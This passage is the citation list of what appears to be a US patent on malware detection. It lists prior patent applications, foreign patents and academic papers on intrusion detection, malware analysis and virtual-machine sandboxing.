20120174186 Aziz et al. Jul 2012 A1
20120174218 McCoy et al. Jul 2012 A1
20120210423 Friedrichs et al. Aug 2012 A1
20120222121 Staniford et al. Aug 2012 A1
20120233698 Watters et al. Sep 2012 A1
20120278886 Luna Nov 2012 A1
20120331553 Aziz et al. Dec 2012 A1
20130036472 Aziz Feb 2013 A1
20130047257 Aziz Feb 2013 A1
20130097706 Titonis et al. Apr 2013 A1
20130185795 Winn et al. Jul 2013 A1
20130227691 Aziz et al. Aug 2013 A1
20130232577 Watters et al. Sep 2013 A1
20130247186 LeMasters Sep 2013 A1
20130282426 Watters et al. Oct 2013 A1
20130291109 Staniford et al. Oct 2013 A1
20130318038 Shiffer et al. Nov 2013 A1
20130318073 Shiffer et al. Nov 2013 A1
20130325791 Shiffer et al. Dec 2013 A1
20130325792 Shiffer et al. Dec 2013 A1
20130325871 Shiffer et al. Dec 2013 A1
20130325872 Shiffer et al. Dec 2013 A1
20140032875 Butler Jan 2014 A1
20140181131 Ross Jun 2014 A1
20140189687 Jung et al. Jul 2014 A1
20140189866 Shiffer et al. Jul 2014 A1
20140189882 Jung et al. Jul 2014 A1
20140237600 Silberman et al. Aug 2014 A1
20140280245 Wilson Sep 2014 A1
20140283037 Sikorski et al. Sep 2014 A1
20140283063 Thompson et al. Sep 2014 A1
20140297494 Watters et al. Oct 2014 A1
20140337836 Ismael Nov 2014 A1
20140344926 Cunningham et al. Nov 2014 A1
20140380473 Bu et al. Dec 2014 A1
20140380474 Paithane et al. Dec 2014 A1
20150007312 Pidathala et al. Jan 2015 A1
20150096022 Vincent et al. Apr 2015 A1
20150096023 Mesdaq et al. Apr 2015 A1
20150096024 Haq et al. Apr 2015 A1
20150096025 Ismael Apr 2015 A1
20150180886 Staniford et al. Jun 2015 A1
20150186645 Aziz et al. Jul 2015 A1
20150199513 Ismael et al. Jul 2015 A1
20150199531 Ismael et al. Jul 2015 A1
20150199532 Ismael et al. Jul 2015 A1
20150220735 Paithane et al. Aug 2015 A1
20150372980 Eyada Dec 2015 A1
20160004869 Ismael et al. Jan 2016 A1
20160006756 Ismael et al. Jan 2016 A1
20160044000 Cunningham Feb 2016 A1
20160127393 Aziz et al. May 2016 A1
20160191547 Zafar et al. Jun 2016 A1
20160191550 Ismael et al. Jun 2016 A1
20160241580 Watters et al. Aug 2016 A1
20160241581 Watters et al. Aug 2016 A1
20160261612 Mesdaq et al. Sep 2016 A1
20160285914 Singh et al. Sep 2016 A1
20160301703 Aziz Oct 2016 A1
20160323295 Joram et al. Nov 2016 A1
20160335110 Paithane et al. Nov 2016 A1
20170083703 Abbasi et al. Mar 2017 A1
20180013770 Ismael Jan 2018 A1
20180048660 Paithane et al. Feb 2018 A1
20180069891 Watters et al. Mar 2018 A1
20180097787 Murthy Apr 2018 A1
20180097788 Murthy Apr 2018 A1
20180097789 Murthy Apr 2018 A1
20180121316 Ismael et al. May 2018 A1
20180288077 Siddiqui et al. Oct 2018 A1
20190104154 Kumar et al. Apr 2019 A1
20190132334 Johns et al. May 2019 A1
20190207966 Vashisht et al. Jul 2019 A1
20190207967 Vashisht et al. Jul 2019 A1
20200252428 Gardezi et al. Aug 2020 A1
Foreign Referenced Citations (11)
Number Date Country
2439806 Jan 2008 GB
2490431 Oct 2012 GB
0206928 Jan 2002 WO
0223805 Mar 2002 WO
2007117636 Oct 2007 WO
2008041950 Apr 2008 WO
2011084431 Jul 2011 WO
2011112348 Sep 2011 WO
2012075336 Jun 2012 WO
2012145066 Oct 2012 WO
2013067505 May 2013 WO
Non-Patent Literature Citations (57)
Entry
Venezia, Paul, “NetDetector Captures Intrusions”, InfoWorld Issue 27, (“Venezia”), (Jul. 14, 2003).
Vladimir Getov: “Security as a Service in Smart Clouds—Opportunities and Concerns”, Computer Software and Applications Conference (COMPSAC), 2012 IEEE 36th Annual, IEEE, Jul. 16, 2012 (Jul. 16, 2012).
Wahid et al., Characterising the Evolution in Scanning Activity of Suspicious Hosts, Oct. 2009, Third International Conference on Network and System Security, pp. 344-350.
Whyte, et al., “DNS-Based Detection of Scanning Works in an Enterprise Network”, Proceedings of the 12th Annual Network and Distributed System Security Symposium, (Feb. 2005), 15 pages.
Williamson, Matthew M., “Throttling Viruses: Restricting Propagation to Defeat Malicious Mobile Code”, ACSAC Conference, Las Vegas, NV, USA, (Dec. 2002), pp. 1-9.
Yuhei Kawakoya et al: “Memory behavior-based automatic malware unpacking in stealth debugging environment”, Malicious and Unwanted Software (Malware), 2010 5th International Conference on, IEEE, Piscataway, NJ, USA, Oct. 19, 2010, pp. 39-46, XP031833827, ISBN:978-1-4244-8-9353-1.
Zhang et al., The Effects of Threading, Infection Time, and Multiple-Attacker Collaboration on Malware Propagation, Sep. 2009, IEEE 28th International Symposium on Reliable Distributed Systems, pp. 73-82.
“Mining Specification of Malicious Behavior”—Jha et al, UCSB, Sep. 2007 https://www.cs.ucsb.edu/.about.chris/research/doc/esec07.sub.-mining.pdf-.
“Network Security: NetDetector—Network Intrusion Forensic System (NIFS) Whitepaper”, (“NetDetector Whitepaper”), (2003).
“When Virtual is Better Than Real”, IEEEXplore Digital Library, available at, http://ieeexplore.ieee.org/xpl/articleDetails.isp?reload=true&arnumbe- r=990073, (Dec. 7, 2013).
Abdullah, et al., Visualizing Network Data for Intrusion Detection, 2005 IEEE Workshop on Information Assurance and Security, pp. 100-108.
Adetoye, Adedayo , et al., “Network Intrusion Detection & Response System”, (“Adetoye”), (Sep. 2003).
Apostolopoulos, George; hassapis, Constantinos; “V-eM: A cluster of Virtual Machines for Robust, Detailed, and High-Performance Network Emulation”, 14th IEEE International Symposium on Modeling, Analysis, and Simulation of Computer and Telecommunication Systems, Sep. 11-14, 2006, pp. 117-126.
Aura, Tuomas, “Scanning electronic documents for personally identifiable information”, Proceedings of the 5th ACM workshop on Privacy in electronic society. ACM, 2006.
Baecher, “The Nepenthes Platform: An Efficient Approach to collect Malware”, Springer-verlag Berlin Heidelberg, (2006), pp. 165-184.
Bayer, et al., “Dynamic Analysis of Malicious Code”, J Comput Virol, Springer-Verlag, France., (2006), pp. 67-77.
Boubalos, Chris , “extracting syslog data out of raw pcap dumps, seclists.org, Honeypots mailing list archives”, available at http://seclists.org/honeypots/2003/q2/319 (“Boubalos”), (Jun. 5, 2003).
Chaudet, C. , et al., “Optimal Positioning of Active and Passive Monitoring Devices”, International Conference on Emerging Networking Experiments and Technologies, Proceedings of the 2005 ACM Conference on Emerging Network Experiment and Technology, CoNEXT '05, Toulousse, France, (Oct. 2005), pp. 71-82.
Chen, P. M. and Noble, B. D., “When Virtual is Better Than Real, Department of Electrical Engineering and Computer Science”, University of Michigan (“Chen”) (2001).
Cisco “Intrusion Prevention for the Cisco ASA 5500-x Series” Data Sheet (2012).
Dohen, M.I. , “PyFlag—An advanced network forensic framework”, Digital investigation 5, Elsevier, (2008), pp. S112-S120.
Dosta, M. , et al., “Vigilante: End-to-End Containment of Internet Worms”, SOSP '05, Association for Computing Machinery, Inc., Brighton U.K., (Oct. 23-26, 2005).
Didier Stevens, “Malicious PDF Documents Explained”, Security & Privacy, IEEE, IEEE Service Center, Los Alamitos, CA, US, vol. 9, No. 1, Jan. 1, 2011, pp. 80-82, XP011329453, SSN: 1540-7993, DOI: 10.1109/MSP.2011.14.
Distler, “Malware Analysis: An Introduction”, SANS Institute InfoSec Reading Room, SANS Institute, (2007).
Dunlap, George W. , et al., “ReVirt: Enabling Intrusion Analysis through Virtual-Machine Logging and Replay”, Proceeding of the 5th Symposium on Operating Systems Design and Implementation, USENIX Association, (“Dunlap”), (Dec. 9, 2002).
FireEye Malware Analysis & Exchange Network, Malware Protection System, FireEye Inc., 2010.
FireEye Malware Analysis, Modern Malware Forensics, FireEye Inc., 2010.
FireEye v.6.0 Security Target, pp. 1-35, Version 1.1, FireEye Inc., May 2011.
Goel, et al., Reconstructing System State for Intrusion Analysis, Apr. 2008 SIGOPS Operating Systems Review, vol. 42 Issue 3, pp. 21-28.
Gregg Keizer: “Microsoft's HoneyMonkeys Show Patching Windows Works”, Aug. 8, 2005, XP055143386, Retrieved from the Internet: URL:http://www.informationweek.com/microsofts-honeymonkeys-show-patching-windows-works/d/d-id/1035069? [retrieved on Jun. 1, 2016].
Heng Yin et al, Panorama: Capturing System-Wide Information Flow for Malware Detection and Analysis, Research Showcase @ CMU, Carnegie Mellon University, 2007.
Hiroshi Shinotsuka, Malware Authors Using New Techniques to Evade Automated Threat Analysis Systems, Oct. 26, 2012, http://www.symantec.com/connect/blogs/, pp. 1-4.
Idika et al., A-Survey-of-Malware-Detection-Techniques, Feb. 2, 2007, Department of Computer Science, Purdue University.
Isohara, Takamasa, Keisuke Takemori, and Ayumu Kubota. “Kernel-based behavior analysis for android malware detection.” Computational intelligence and Security (CIS), 2011 Seventh International Conference on. IEEE, 2011.
Kaeo, Merike , “Designing Network Security”, (“Kaeo”), (Nov. 2003).
Kevin A Roundy et al: “Hybrid Analysis and Control of Malware”, Sep. 15, 2010, Recent Advances in Intrusion Detection, Springer Berlin Heidelberg, Berlin, Heidelberg, pp. 317-338, XP019150454 ISBN:978-3-642-15511-6.
Khaled Salah et al: “Using Cloud Computing to Implement a Security Overlay Network”, Security & Privacy, IEEE, IEEE Service Center, Los Alamitos, CA, US, vol. 11, No. 1, Jan. 1, 2013 (Jan. 1, 2013).
Kim, H. , et al., “Autograph: Toward Automated, Distributed Worm Signature Detection”, Proceedings of the 13th Usenix Security Symposium (Security 2004), San Diego, (Aug. 2004), pp. 271-286.
King, Samuel T., et al., “Operating System Support for Virtual Machines”, (“King”), (2003).
Kreibich, C. , et al., “Honeycomb-Creating Intrusion Detection Signatures Using Honeypots”, 2nd Workshop on Hot Topics in Networks (HotNets-11), Boston, USA, (2003).
Kristoff, J. , “Botnets, Detection and Mitigation: DNS-Based Techniques”, NU Security Day, (2005), 23 pages.
Lastline Labs, The Threat of Evasive Malware, Feb. 25, 2013, Lastline Labs, pp. 1-8.
Li et al., A VMM-Based System Call Interposition Framework for Program Monitoring, Dec. 2010, IEEE 16th International Conference on Parallel and Distributed Systems, pp. 706-711.
Lindorfer, Martina, Clemens Kolbitsch, and Paolo Milani Comparetti. “Detecting environment-sensitive malware.” Recent Advances in Intrusion Detection. Springer Berlin Heidelberg, 2011.
Marchette, David J., “Computer Intrusion Detection and Network Monitoring: A Statistical Viewpoint”, (“Marchette”), (2001).
Moore, D. , et al., “Internet Quarantine: Requirements for Containing Self-Propagating Code”, INFOCOM, vol. 3, (Mar. 30-Apr. 3, 2003), pp. 1901-1910.
Morales, Jose A., et al., ““Analyzing and exploiting network behaviors of malware.””, Security and Privacy in Communication Networks. Springer Berlin Heidelberg, 2010. 20-34.
Mori, Detecting Unknown Computer Viruses, 2004, Springer-Verlag Berlin Heidelberg.
Natvig, Kurt, “SANDBOXII: Internet”, Virus Bulletin Conference, (“Natvig”), (Sep. 2002).
NetBIOS Working Group. Protocol Standard fora NetBIOS Service on a TCP/UDP transport: Concepts and Methods. STD 19, RFC 1001, Mar. 1987.
Newsome, J. , et al., “Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software”, In Proceedings of the 12th Annual Network and Distributed System Security, Symposium (NDSS '05), (Feb. 2005).
Nojiri, D. , et al., “Cooperation Response Strategies for Large Scale Attack Mitigation”, DARPA Information Survivability Conference and Exposition, vol. 1, (Apr. 22-24, 2003), pp. 293-302.
Oberheide et al., CloudAV.sub.-N-Version Antivirus in the Network Cloud, 17th USENIX Security Symposium USENIX Security '08 Jul. 28-Aug. 1, 2008 San Jose, CA.
Reiner Sailer, Enriquillo Valdez, Trent Jaeger, Roonald Perez, Leendertvan Doorn, John Linwood Griffin, Stefan Berger., sHype: Secure Hypervisor Appraoch to Trusted Virtualized Systems (Feb. 2, 2005) (“Sailer”).
Silicon Defense, “Worm Containment in the Internal Network”, (Mar. 2003), pp. 1-25.
Singh, S. , et al., “Automated Worm Fingerprinting”, Proceedings of the ACM/USENIX Symposium on Operating System Design and Implementation, San Francisco, California, (Dec. 2004).
Thomas H. Ptacek, and Timothy N. Newsham , “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”, Secure Networks, (“Ptacek”), (Jan. 1998).
Provisional Applications (1)
Number Date Country
62826875 Mar 2019 US